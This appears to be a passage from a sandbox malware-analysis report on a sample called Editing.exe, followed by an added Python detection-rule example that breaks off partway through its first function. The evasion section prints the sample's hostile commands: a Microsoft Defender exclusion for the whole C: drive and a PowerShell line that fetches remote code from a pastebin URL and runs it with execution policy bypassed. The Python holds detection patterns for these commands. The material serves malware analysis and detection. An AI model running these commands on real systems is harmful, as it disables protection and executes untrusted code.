Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\ Editing.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Users\user\Desktop\ Editing.exe Memory allocated: 24437CD0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\ Editing.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (4 entries)
Source: C:\Users\user\Desktop\ Editing.exe Window / User API: threadDelayed 3173
Source: C:\Users\user\Desktop\ Editing.exe Window / User API: threadDelayed 368
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7843
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1757
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7032
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2741
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7496
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2179
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\fri53hgi\fri53hgi.dll
Source: C:\Users\user\Desktop\ Editing.exe API coverage: 0.0 %
Source: C:\Users\user\Desktop\ Editing.exe TID: 884 Thread sleep count: 3173 > 30
Source: C:\Users\user\Desktop\ Editing.exe TID: 884 Thread sleep count: 368 > 30
Source: C:\Users\user\Desktop\ Editing.exe TID: 5724 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 764 Thread sleep count: 7843 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5088 Thread sleep count: 1757 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2672 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5028 Thread sleep count: 7032 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5196 Thread sleep count: 2741 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1936 Thread sleep time: -13835058055282155s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1372 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2488 Thread sleep count: 7496 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1588 Thread sleep count: 2179 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4188 Thread sleep time: -3689348814741908s >= -30000s
Source: Editing.exe, 00000000.00000003.2555244035.00000284CDA3B000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000003.2984905082.00000284CDA3B000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3213355561.00000284CD9D6000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000003.3198274498.00000284CDA3B000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000003.2460451409.00000284CDA3B000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000003.2727732700.00000284CDA3B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2274209280.0000020A7A8FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\ Editing.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\ Editing.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:' (x4)
Source: C:\Users\user\Desktop\ Editing.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 7FFD9A863843
Source: C:\Users\user\Desktop\ Editing.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Users\user\Desktop\ Editing.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"
Source: C:\Users\user\Desktop\ Editing.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fri53hgi\fri53hgi.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD5A5.tmp" "c:\Users\user\AppData\Local\Temp\fri53hgi\CSCED018B8952BA4EF4818E245D55BA92D6.TMP"
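The three process-creation lines above form the chain a detection engineer wants to catch: a Desktop executable spawning PowerShell to add a Defender exclusion for the whole C: volume, a second PowerShell running an in-memory download cradle from a paste site with the execution policy bypassed, and a third PowerShell spawning csc.exe to compile source from %TEMP% (the pattern Add-Type produces). The Python below is an added example written for this page; it is not part of the Joe Sandbox report or of the analysed sample. It evaluates rule logic over process-creation records shaped like Sysmon event 1 or Security event 4688 with command-line auditing. The four sample records are constructed from the report's own command lines plus one benign control (the C:\Build\cache exclusion) that is an assumption; the rule names, severities and the paste-site host list are also assumptions to adapt to local telemetry.

```python
"""Detection rules for the Editing.exe process chain (added example, not report code)."""
import re
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import urlparse


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (parent image, child image, command line)."""
    parent_image: str
    image: str
    command_line: str


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    detail: str


POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CSC = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"

# Constructed sample events: the first three copy the report's command lines,
# the fourth is an assumed benign admin action used as a control.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Users\user\Desktop\ Editing.exe", POWERSHELL,
              "\"powershell.exe\" Add-MpPreference -ExclusionPath 'C:'"),
    ProcEvent(r"C:\Users\user\Desktop\ Editing.exe", POWERSHELL,
              '"powershell.exe" -ExecutionPolicy Bypass -Command '
              '"iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"'),
    ProcEvent(POWERSHELL, CSC,
              r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths '
              r'@"C:\Users\user\AppData\Local\Temp\fri53hgi\fri53hgi.cmdline"'),
    ProcEvent(r"C:\Windows\System32\cmd.exe", POWERSHELL,
              r"powershell.exe Add-MpPreference -ExclusionPath 'C:\Build\cache'"),
]

PS_RE = re.compile(r"\\powershell(?:_ise)?\.exe$", re.I)
CSC_RE = re.compile(r"\\csc\.exe$", re.I)
# Add-MpPreference -ExclusionPath|Process|Extension <value>, value quoted or bare.
MP_EXCL_RE = re.compile(
    r"""Add-MpPreference\s+.*?-Exclusion(?P<kind>Path|Process|Extension)\s+"""
    r"""(?:'(?P<sq>[^']*)'|"(?P<dq>[^"]*)"|(?P<bare>[^\s,]+))""", re.I)
DRIVE_ROOT_RE = re.compile(r"^[A-Za-z]:\\?$")
IEX_RE = re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I)
FETCH_RE = re.compile(r"\b(?:iwr|Invoke-WebRequest|irm|Invoke-RestMethod|DownloadString|DownloadFile)\b", re.I)
URL_RE = re.compile(r"""https?://[^\s"')]+""", re.I)
# Response file under the user's Temp directory, as written by Add-Type/CodeDom.
TEMP_CMDLINE_RE = re.compile(r"""@"?(?P<rsp>[^"\s]*\\AppData\\Local\\Temp\\[^"\s]*\.cmdline)""", re.I)
PASTE_HOSTS = {"pastebin.com"}  # assumed starter list; extend with local intel


def detect_defender_exclusion(ev: ProcEvent) -> Optional[Finding]:
    """Any Add-MpPreference exclusion is notable; a drive-root path removes a whole volume from scanning."""
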